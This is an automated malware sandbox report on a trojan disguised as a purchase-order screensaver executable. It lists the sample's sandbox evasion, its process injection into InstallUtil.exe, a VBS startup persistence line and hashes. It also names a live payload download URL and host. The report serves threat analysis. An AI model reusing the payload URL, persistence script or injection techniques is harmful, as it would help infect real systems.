                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q 1:en-CH:VMware|VIRTUAL|A M I|Xen
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2323587531.0000000001573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 500000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 500000Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 502000Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 55C000Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 55E000Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3F2008Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeQueries volume information: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts2
                      Windows Management Instrumentation
                      1
                      Scripting
                      211
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping1
                      Query Registry
                      Remote Services1
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      1
                      Disable or Modify Tools
                      LSASS Memory221
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Registry Run Keys / Startup Folder
                      2
                      Registry Run Keys / Startup Folder
                      51
                      Virtualization/Sandbox Evasion
                      Security Account Manager1
                      Process Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      211
                      Process Injection
                      NTDS51
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput Capture13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Software Packing
                      Cached Domain Credentials1
                      System Network Configuration Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem32
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586498 Sample: Purchase Order A2409002.scr.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 36 www.new.eventawardsrussia.com 2->36 40 Antivirus detection for URL or domain 2->40 42 Antivirus detection for dropped file 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 14 other signatures 2->46 8 Purchase Order A2409002.scr.exe 15 6 2->8         started        signatures3 process4 dnsIp5 38 www.new.eventawardsrussia.com 5.23.51.54, 443, 49709 TIMEWEB-ASRU Russian Federation 8->38 30 C:\Users\user\...\InheritanceFlags.exe, PE32 8->30 dropped 32 C:\Users\user\...\InheritanceFlags.vbs, ASCII 8->32 dropped 34 C:\...\InheritanceFlags.exe:Zone.Identifier, ASCII 8->34 dropped 48 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->48 50 Writes to foreign memory regions 8->50 52 Injects a PE file into a foreign processes 8->52 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        18 InstallUtil.exe 2 8->18         started        file6 signatures7 process8 signatures9 54 Uses ipconfig to lookup or modify the Windows network settings 13->54 20 conhost.exe 13->20         started        22 ipconfig.exe 1 13->22         started        24 conhost.exe 16->24         started        26 ipconfig.exe 1 16->26         started        28 WerFault.exe 4 18->28         started        process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Purchase Order A2409002.scr.exe68%ReversingLabsWin32.Trojan.Leonem
                      Purchase Order A2409002.scr.exe62%VirustotalBrowse
                      Purchase Order A2409002.scr.exe100%AviraHEUR/AGEN.1308518
                      Purchase Order A2409002.scr.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\InheritanceFlags.exe100%AviraHEUR/AGEN.1308518
                      C:\Users\user\AppData\Roaming\InheritanceFlags.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\InheritanceFlags.exe68%ReversingLabsWin32.Trojan.Leonem
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.new.eventawardsrussia.com/wp-includes/Cgntbjy.vdf100%Avira URL Cloudmalware
                      https://www.new.eventawardsrussia.com0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.new.eventawardsrussia.com
                      5.23.51.54
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://www.new.eventawardsrussia.com/wp-includes/Cgntbjy.vdffalse
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netPurchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/mgravell/protobuf-netiPurchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/14436606/23354Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJPurchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/11564914/23354;Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/2152978/23354Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.new.eventawardsrussia.comPurchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      5.23.51.54
                                      www.new.eventawardsrussia.comRussian Federation
                                      9123TIMEWEB-ASRUfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1586498
                                      Start date and time:2025-01-09 08:27:34 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 59s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:14
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Purchase Order A2409002.scr.exe
                                      Detection:MAL
                                      Classification:mal100.expl.evad.winEXE@14/3@1/1
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 91%
                                      • Number of executed functions: 343
                                      • Number of non-executed functions: 61
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target InstallUtil.exe, PID 3412 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      02:28:24API Interceptor23x Sleep call for process: Purchase Order A2409002.scr.exe modified
                                      08:28:40AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InheritanceFlags.vbs
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      5.23.51.54SpiMLVsYmg.exeGet hashmaliciousUnknownBrowse
                                      • ck12339.tmweb.ru/reciver.php
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      www.new.eventawardsrussia.comNEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      Order Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TIMEWEB-ASRUNEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      hK8z1AmKO1.exeGet hashmaliciousDCRatBrowse
                                      • 185.114.245.123
                                      arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 91.210.168.189
                                      bot.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 91.210.168.190
                                      LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                      • 92.53.106.114
                                      jew.m68k.elfGet hashmaliciousUnknownBrowse
                                      • 176.57.212.213
                                      2.exeGet hashmaliciousUnknownBrowse
                                      • 92.53.116.138
                                      Order Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eRef#103052.exeGet hashmaliciousXWormBrowse
                                      • 5.23.51.54
                                      NEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      https://redduppgh.com/Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      https://minia.n1tab.com/Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      http://topmarktingplace.com/4vfVEJ42616owhy1324yhmrkkdpck110EVYGTFUNAFUPGFT22589MFQQ17548D10Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      http://topmarktingplace.com/4KCrhO42616HeLs1324axlafysauc110UGQLALGLNEZCHJM22589XDWY17548d10Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                      • 5.23.51.54
                                      ZipThis.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                      • 5.23.51.54
                                      No context
                                      Process:C:\Users\user\Desktop\Purchase Order A2409002.scr.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):13312
                                      Entropy (8bit):4.814200013136697
                                      Encrypted:false
                                      SSDEEP:192:K2utwNpK8D0CW2+PqlndkpAfQZz/IJk6:K2uyNpSCW2+cdkpAIZz/I6
                                      MD5:C6F7275A080D01719B1772FA6E33D4C8
                                      SHA1:3416CF2F8CBF4E4C201B15B4463A09F24FA38973
                                      SHA-256:99F4980053D86704D597E388971EDA5FDEDD4C64B9B9ADC8DD905A815BE4E8A9
                                      SHA-512:5E5D3DEC5022D8F8502132BA99E54C220A24854066C445F3FE39CB432B4C7F1C9E12467581F97DBA19D8BB57E98C57E3BFAFAE356C8CD0DA1089CB0E102EB2E3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<}g....................."......./... ...@....@.. ....................................`.....................................O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@... ..................@..@.reloc.......`.......2..............@..B........................H........!...............................................................(....*..(....*..0..X.......(....u.....o....(.....(.....o....o....X.>*........(.....r...po....rM..p(....(...+o....&*.0............8A....s....%o....ra..prw..po....%rX..ps....o....o.....o ........&......,.r...p(!....r...p(!....s"....s#..........o$....s%...........io&...s'...%..o(...o)......+.....9......o*......9......o*.....9.....o*......*..4......:B..........%.........n.F.........g.\.......BSJB............
                                      Process:C:\Users\user\Desktop\Purchase Order A2409002.scr.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\Purchase Order A2409002.scr.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):94
                                      Entropy (8bit):4.6673830383414785
                                      Encrypted:false
                                      SSDEEP:3:FER/n0eFHHoN+EaKC5ck1Eh4AnHn:FER/lFHIN7aZ5rO
                                      MD5:E1C09103969649446CF8E19B68CC488F
                                      SHA1:DEEDEEFEB57D28BEE35CADCEDBEC0FBCA0E57B95
                                      SHA-256:0BF25B17265652CDE622206AB3AFD13D615AAB403906579ED8939714AD597F7D
                                      SHA-512:74F47CF0A52856CBCF364628D064AE4D606E4B51B778A818E80BD82CB3C768C1E669092A6680C258647DCD49DB1BA09ABE82F85A3FA29C0894ABE9E209A6ED04
                                      Malicious:true
                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\InheritanceFlags.exe"""
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):4.814200013136697
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:Purchase Order A2409002.scr.exe
                                      File size:13'312 bytes
                                      MD5:c6f7275a080d01719b1772fa6e33d4c8
                                      SHA1:3416cf2f8cbf4e4c201b15b4463a09f24fa38973
                                      SHA256:99f4980053d86704d597e388971eda5fdedd4c64b9b9adc8dd905a815be4e8a9
                                      SHA512:5e5d3dec5022d8f8502132ba99e54c220a24854066c445f3fe39cb432b4c7f1c9e12467581f97dba19d8bb57e98c57e3bfafae356c8cd0da1089cb0e102eb2e3
                                      SSDEEP:192:K2utwNpK8D0CW2+PqlndkpAfQZz/IJk6:K2uyNpSCW2+cdkpAIZz/I6
                                      TLSH:5F522B04A3614326D9E48BF29EE3C3246370BB41B953AF1F36C2650F3DA5716A532B5A
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<}g....................."......./... ...@....@.. ....................................`................................
                                      Icon Hash:70cccc8692968ec8
                                      Entrypoint:0x402f0e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x677D3CD2 [Tue Jan 7 14:40:18 2025 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2ebc0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1f1a.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xf140x10009d992b482d3cdea3c4eeb133232023ddFalse0.555908203125SysEx File -5.2395051515993245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x40000x1f1a0x2000da8a7572fb767128fe264dada0648bfbFalse0.3973388671875data4.661840297685116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x60000xc0x2000558ae4d21e06c507415803da516912dFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x41300x1870Device independent bitmap graphic, 35 x 84 x 32, image size 58800.4040920716112532
                                      RT_GROUP_ICON0x59a00x14data1.1
                                      RT_VERSION0x59b40x37cdata0.3991031390134529
                                      RT_MANIFEST0x5d300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 9, 2025 08:28:25.593159914 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:25.593208075 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:25.593277931 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:25.605788946 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:25.605807066 CET443497095.23.51.54192.168.2.6
